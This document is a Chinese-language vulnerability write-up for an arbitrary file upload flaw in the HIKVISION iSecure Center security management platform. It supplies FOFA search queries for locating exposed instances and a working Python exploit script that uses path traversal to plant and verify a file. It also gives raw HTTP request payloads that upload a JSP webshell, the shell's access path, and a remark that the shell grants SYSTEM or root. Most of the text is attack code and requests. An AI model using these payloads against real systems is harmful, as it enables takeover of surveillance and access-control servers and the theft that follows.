2. 漏洞描述 HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞 3. 影响版本
HIKVISION iSecure Center综合安防管理平台,在野。 4. fofa查询语句
icon_hash=“-808437027” app=“HIKVISION-iSecure-Center”
5. 漏洞复现
EXP/POC:payload.py 脚本 走127.0.0.1:8080 代理,方便burpsuit抓包。
#!usr/bin/env python
# *-* coding:utf-8 *-*
import sys
import requests
import string
import random
import urllib3
urllib3.disable_warnings()
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080', #127.0.0.1:8080 代理,方便burpsuit抓包
}
def run(arg):
try:
flag=''.join(random.choices(string.ascii_uppercase + string.digits, k = 9))
filename=''.join(random.choices(string.ascii_uppercase + string.digits, k = 10))
vuln_url=arg+"center/api/files;.js"
headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
'Accept': '*/*',
'Content-Type': 'application/x-www-form-urlencoded'}
file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')}
r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
if r.status_code==200 and "webapps/clusterMgr" in r.text:
payload=f"clusterMgr/{filename}.txt;.js"
url=arg+payload
r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
if r2.status_code==200 and flag in r2.text:
print('\033[1;31;40m')
print(arg+f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址:{url}")
print('\033[0m')
else:
print(arg+":不存在漏洞")
except:
print(arg+":不存在漏洞")
if __name__ == '__main__':
url=sys.argv[1]
run(url)
6. burpsuit抓包分析
burpsuit 127.0.0.1:8080抓包,抓取post 包一个,get 请求包一个。 payload:请求数据包
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream
9YPQ3I3ZS
--e54e7e5834c8c50e92189959fe7227a4--
payload的返回数据包。
HTTP/1.1 200
Server: openresty/1.13.6.2
Date: Fri, 14 Jul 2023 04:35:23 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 335
Connection: close
Set-Cookie: JSESSIONID=0A235873FB1C02C345345C0D36A4C709; Path=/center; HttpOnly
Content-Language: en_US
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Content-Disposition: inline;filename=f.txt
{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/
访问漏洞链接:https://x.x.x.x/clusterMgr/2BT5AV96QW.txt;.js ,查看是否上传成功。
因为Hikvision平台使用的中间件为tomcat,修改报文和文件名,所以实现上传哥斯拉生成jsp。 宿主服务器windows和linux都可使用。windows 拿到的账户是system账户,linux为root。 Hikvison账户管理密码的后渗透操作:海康威视综合安防后渗透利用技巧
POC2
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
report 任意文件上传漏洞
POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
马儿路径:/portal/ui/login/..;/..;/new.jsp